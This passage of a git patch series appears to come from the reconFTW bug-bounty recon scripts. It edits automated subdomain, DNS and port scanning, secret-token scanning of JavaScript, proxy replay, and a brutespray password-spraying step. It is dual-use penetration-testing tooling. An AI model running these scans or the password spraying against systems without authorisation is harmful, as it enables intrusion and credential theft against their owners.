81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -follow-host-redirects -random-agent -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt + eval nmap -p $UNCOMMON_PORTS_WEB --max-retries 2 -Pn -iL subdomains/subdomains.txt -oG .tmp/nmap_uncommonweb.txt $DEBUG_STD && uncommon_ports_checked=$(cat .tmp/nmap_uncommonweb.txt | egrep -v "^#|Status: Up" | cut -d' ' -f4- | sed -n -e 's/Ignored.*//p' | tr ',' '\n' | sed -e 's/^[ \t]*//' | sort -u | cut -d '/' -f1 | sed -e 'H;${x;s/\n/,/g;s/^,//;p;};d') + cat subdomains/subdomains.txt | httpx -ports $uncommon_ports_checked -follow-host-redirects -random-agent -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l) notification "Uncommon web ports: ${NUMOFLINES} new websites" good eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR @@ -666,8 +663,8 @@ function screenshot(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBSCREENSHOT" = true ] then start_func "Web Screenshots" - eval gowitness file -f webs/webs.txt --disable-logging $DEBUG_ERROR - eval gowitness file -f webs/webs_uncommon_ports.txt --disable-logging $DEBUG_ERROR + eval cat webs/webs.txt webs/webs_uncommon_ports.txt $DEBUG_ERROR | anew -q .tmp/webs_screenshots.txt + eval gowitness file -f .tmp/webs_screenshots.txt --disable-logging $DEBUG_ERROR end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} else if [ "$WEBSCREENSHOT" = false ]; then @@ -715,11 +712,8 @@ function portscan(){ echo "$sub $(dig +short a $sub | tail -n1)" | anew -q .tmp/subs_ips.txt done awk '{ print $2 " " $1}' .tmp/subs_ips.txt | sort -k2 -n | anew -q hosts/subs_ips_vhosts.txt - eval cat hosts/subs_ips_vhosts.txt $DEBUG_ERROR | cut -d ' ' -f1 | egrep -iv "^(127|10|169|172|192)\." | anew -q hosts/ips.txt - eval cat hosts/ips.txt $DEBUG_ERROR | cf-check | egrep -iv "^(127|10|169|172|192)\." | anew -q .tmp/ips_nowaf.txt - printf "${bblue}\n Resolved IP addresses (No WAF) ${reset}\n\n"; eval cat .tmp/ips_nowaf.txt $DEBUG_ERROR | sort @@ -733,7 +727,7 @@ function portscan(){ if [ "$PORTSCAN_ACTIVE" = true ] then - eval nmap --top-ports 1000 -sV -n --max-retries 2 -iL .tmp/ips_nowaf.txt -oN hosts/portscan_active.txt -oG .tmp/nmap_grep.gnmap $DEBUG_STD + eval nmap --top-ports 1000 -sV -n --max-retries 2 -Pn -iL .tmp/ips_nowaf.txt -oN hosts/portscan_active.txt -oG .tmp/nmap_grep.gnmap $DEBUG_STD fi end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]} @@ -1059,7 +1053,7 @@ function brokenLinks(){ fi fi sed -i '/^.\{2048\}./d' .tmp/gospider.txt - cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -random-agent -status-code -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt + cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt NUMOFLINES=$(eval cat .tmp/brokenLinks_total.txt $DEBUG_ERROR | anew webs/brokenLinks.txt | wc -l) notification "${NUMOFLINES} new broken links found" info end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]} @@ -1460,7 +1454,7 @@ function start(){ if [ -z "$domain" ] then - printf "\n\n${bred} No domain or list provided ${reset}\n\n" + notification "\n\n${bred} No domain or list provided ${reset}\n\n" error exit fi @@ -1680,6 +1674,8 @@ function multi_recon(){ function subs_menu(){ start subdomains_full + webprobe_full + screenshot subtakeover zonetransfer s3buckets diff --git a/reconftw_axiom.sh b/reconftw_axiom.sh index e175c00b..9448e5a2 100755 --- a/reconftw_axiom.sh +++ b/reconftw_axiom.sh @@ -357,7 +357,7 @@ function sub_crt(){ eval axiom-scan .tmp/sub_ctrf_commands.txt -m exec -o .tmp/crtsh_subs_tmp.txt $DEBUG_STD eval curl "https://tls.bufferover.run/dns?q=.${domain}" $DEBUG_ERROR | eval jq -r .Results[] $DEBUG_ERROR | cut -d ',' -f3 | grep -F ".$domain" | anew -q .tmp/crtsh_subs.txt eval curl "https://dns.bufferover.run/dns?q=.${domain}" $DEBUG_ERROR | eval jq -r '.FDNS_A'[],'.RDNS'[] $DEBUG_ERROR | cut -d ',' -f2 | grep -F ".$domain" | anew -q .tmp/crtsh_subs_tmp.txt - NUMOFLINES=$(eval cat .tmp/crtsh_subs_tmp.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/crtsh_subs.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/crtsh_subs_tmp.txt $DEBUG_ERROR | anew .tmp/crtsh_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (cert transparency)" ${FUNCNAME[0]} else if [ "$SUBCRT" = false ]; then @@ -499,7 +499,7 @@ function sub_permut(){ if [ -f ".tmp/permute_subs.txt" ] then deleteOutScoped $outOfScope_file .tmp/permute_subs.txt - NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep ".$domain$" |anew subdomains/subdomains.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep ".$domain$" | anew subdomains/subdomains.txt | wc -l) else NUMOFLINES=0 fi @@ -623,6 +623,11 @@ function webprobe_simple(){ deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l) end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/webs.txt| wc -l) -le 1500 ]] + then + notification "Sending websites to proxy" info + eval ffuf -mc all -w webs/webs.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD + fi else if [ "$WEBPROBESIMPLE" = false ]; then printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" @@ -636,11 +641,17 @@ function webprobe_full(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ] then start_func "Http probing non standard ports" - eval axiom-scan subdomains/subdomains.txt -m httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -follow-host-redirects -random-agent -status-code -timeout 10 -threads $HTTPX_UNCOMMONPORTS_THREADS -silent -retries 2 -no-color -o .tmp/probed_uncommon_ports_tmp_.txt $DEBUG_STD && cat .tmp/probed_uncommon_ports_tmp_.txt | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_uncommon_ports_tmp.txt + eval axiom-scan subdomains/subdomains.txt -m nmapx -p $UNCOMMON_PORTS_WEB --max-retries 2 -Pn -o .tmp/nmap_uncommonweb.txt $DEBUG_STD && uncommon_ports_checked=$(cat .tmp/nmap_uncommonweb.txt | egrep -v "^#|Status: Up" | cut -d' ' -f4- | sed -n -e 's/Ignored.*//p' | tr ',' '\n' | sed -e 's/^[ \t]*//' | sort -u | cut -d '/' -f1 | sed -e 'H;${x;s/\n/,/g;s/^,//;p;};d') + eval axiom-scan subdomains/subdomains.txt -m httpx -ports $uncommon_ports_checked -follow-host-redirects -random-agent -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -retries 2 -no-color -o .tmp/probed_uncommon_ports_tmp_.txt $DEBUG_STD && cat .tmp/probed_uncommon_ports_tmp_.txt | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_uncommon_ports_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l) notification "Uncommon web ports: ${NUMOFLINES} new websites" good eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]} + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/webs_uncommon_ports.txt| wc -l) -le 1500 ]] + then + notification "Sending websites uncommon ports to proxy" info + eval ffuf -mc all -w webs/webs_uncommon_ports.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD + fi else if [ "$WEBPROBEFULL" = false ]; then printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" @@ -654,8 +665,8 @@ function screenshot(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBSCREENSHOT" = true ] then start_func "Web Screenshots" - eval axiom-scan webs/webs.txt -m gowitness --disable-logging -o screenshots $DEBUG_STD - eval axiom-scan webs/webs_uncommon_ports.txt -m gowitness --disable-logging -o screenshots $DEBUG_STD + eval cat webs/webs.txt webs/webs_uncommon_ports.txt $DEBUG_ERROR | anew -q .tmp/webs_screenshots.txt + eval axiom-scan .tmp/webs_screenshots.txt -m gowitness -o screenshots $DEBUG_STD end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} else if [ "$WEBSCREENSHOT" = false ]; then @@ -718,7 +729,7 @@ function portscan(){ if [ "$PORTSCAN_ACTIVE" = true ] then - eval axiom-scan .tmp/ips_nowaf.txt -m nmap --top-ports 1000 -sV -n --max-retries 2 -oN hosts/portscan_active.txt -oG .tmp/nmap_grep.gnmap $DEBUG_STD + eval axiom-scan .tmp/ips_nowaf.txt -m nmapx --top-ports 1000 -sV -n -Pn --max-retries 2 -o hosts/portscan_active.txt $DEBUG_STD fi end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]} @@ -883,10 +894,8 @@ function urlchecks(){ then start_func "URL Extraction" mkdir -p js - eval axiom-scan webs/webs.txt -m waybackurls -o .tmp/url_extract_way_tmp.txt $DEBUG_STD && eval cat .tmp/url_extract_way_tmp.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt eval axiom-scan webs/webs.txt -m gau -o .tmp/url_extract_gau_tmp.txt $DEBUG_STD && eval cat .tmp/url_extract_gau_tmp.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt - diff_webs=$(diff <(sort -u .tmp/probed_tmp.txt) <(sort -u webs/webs.txt) | wc -l) if [ $diff_webs != "0" ] || [ ! -s ".tmp/gospider.txt" ] ; then @@ -909,6 +918,11 @@ function urlchecks(){ NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l) notification "${NUMOFLINES} new urls with params" info end_func "Results are saved in webs/url_extract.txt" ${FUNCNAME[0]} + if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/url_extract.txt | wc -l) -le 1500 ]] + then + notification "Sending urls to proxy" info + eval ffuf -mc all -w webs/url_extract.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD + fi else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -970,7 +984,7 @@ function jschecks(){ cat js/url_extract_js.txt | cut -d '?' -f 1 | grep -iE "\.js$" | anew -q js/jsfile_links.txt cat js/url_extract_js.txt | subjs | anew -q js/jsfile_links.txt printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n" - eval axiom-scan js/jsfile_links.txt -m httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/js_livelinks.txt $DEBUG_STD && cat .tmp/js_livelinks.txt | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt + eval axiom-scan js/jsfile_links.txt -m httpx -follow-redirects -random-agent -silent -timeout 15 -threads $HTTPX_THREADS -status-code -retries 2 -no-color -o .tmp/js_livelinks.txt $DEBUG_STD && cat .tmp/js_livelinks.txt | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt printf "${yellow} Running : Gathering endpoints 3/5${reset}\n" if [ -s "js/js_livelinks.txt" ] then @@ -984,7 +998,7 @@ function jschecks(){ printf "${yellow} Running : Gathering secrets 4/5${reset}\n" if [ -s "js/js_livelinks.txt" ] then - eval axiom-scan js/js_livelinks.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_js/js_secrets.txt $DEBUG_STD + eval axiom-scan js/js_livelinks.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/exposures/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD fi printf "${yellow} Running : Building wordlist 5/5${reset}\n" if [ -s "js/js_livelinks.txt" ] @@ -1033,8 +1047,7 @@ function wordlist_gen(){ function brokenLinks(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$BROKENLINKS" = true ] ; then start_func "Broken links checks" - if [ ! -s ".tmp/gospider.txt" ] ; - then + if [ ! -s ".tmp/gospider.txt" ]; then if [ "$DEEP" = true ] ; then eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 3 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD else @@ -1042,7 +1055,7 @@ function brokenLinks(){ fi cat .tmp/gospider/* | sed '/^.\{2048\}./d' | anew -q .tmp/gospider.txt fi - cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt + cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt NUMOFLINES=$(eval cat .tmp/brokenLinks_total.txt $DEBUG_ERROR | anew webs/brokenLinks.txt | wc -l) notification "${NUMOFLINES} new broken links found" info end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]} @@ -1280,7 +1293,7 @@ function spraying(){ then start_func "Password spraying" cd $tools/brutespray - eval python3 $tools/brutespray/brutespray.py --file $dir/.tmp/nmap_grep.gnmap --threads $BRUTESPRAY_THREADS --hosts $BRUTESPRAY_CONCURRENCE -o $dir/hosts/brutespray.txt $DEBUG_STD + eval python3 $tools/brutespray/brutespray.py --file $dir/hosts/portscan_active.txt --threads $BRUTESPRAY_THREADS --hosts $BRUTESPRAY_CONCURRENCE -o $dir/hosts/brutespray.txt $DEBUG_STD cd $dir end_func "Results are saved in hosts/brutespray.txt" ${FUNCNAME[0]} else @@ -1674,6 +1687,8 @@ function multi_recon(){ function subs_menu(){ start subdomains_full + webprobe_full + screenshot subtakeover zonetransfer s3buckets From 7e6b7633425203b2bc0c01d7e34be1fe0025b462 Mon Sep 17 00:00:00 2001 From: six2dez Date: Sat, 24 Apr 2021 15:48:01 +0200 Subject: [PATCH 19/19] dnsx fix --- reconftw.sh | 4 ++-- reconftw_axiom.sh | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index 9ec58e93..759c88a1 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -376,7 +376,7 @@ function sub_active(){ cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD - echo $domain | eval dnsx -silent -r $resolvers_trusted $DEBUG_ERROR | anew -q .tmp/subdomains_tmp.txt + echo $domain | eval dnsx -retry 3 -silent -r $resolvers_trusted $DEBUG_ERROR | anew -q .tmp/subdomains_tmp.txt NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]} else @@ -388,7 +388,7 @@ function sub_dns(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : DNS Subdomain Enumeration" - eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt -r $resolvers_trusted $DEBUG_STD + eval dnsx -retry 3 -a -aaaa -cname -ns -ptr -mx -soa -resp -silent -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt -r $resolvers_trusted $DEBUG_STD cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) diff --git a/reconftw_axiom.sh b/reconftw_axiom.sh index 9448e5a2..4d31eb43 100755 --- a/reconftw_axiom.sh +++ b/reconftw_axiom.sh @@ -379,7 +379,7 @@ function sub_active(){ cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt eval axiom-scan .tmp/subs_no_resolved.txt -m puredns-resolve -o .tmp/subdomains_tmp.txt $DEBUG_STD - echo $domain | dnsx -silent -retry 3 | anew -q .tmp/subdomains_tmp.txt + echo $domain | eval dnsx -retry 3 -silent -r $resolvers_trusted $DEBUG_ERROR | anew -q .tmp/subdomains_tmp.txt NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]} else @@ -391,7 +391,7 @@ function sub_dns(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : DNS Subdomain Enumeration" - eval axiom-scan subdomains/subdomains.txt -m dnsx -retry 3 -silent -cname -resp -o subdomains/subdomains_cname.txt $DEBUG_STD + eval axiom-scan subdomains/subdomains.txt -m dnsx -retry 3 -a -aaaa -cname -ns -ptr -mx -soa -resp -o subdomains/subdomains_cname.txt $DEBUG_STD cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt eval axiom-scan .tmp/subdomains_dns.txt -m puredns-resolve -o .tmp/subdomains_dns_resolved.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | grep ".$domain$" |anew subdomains/subdomains.txt | wc -l)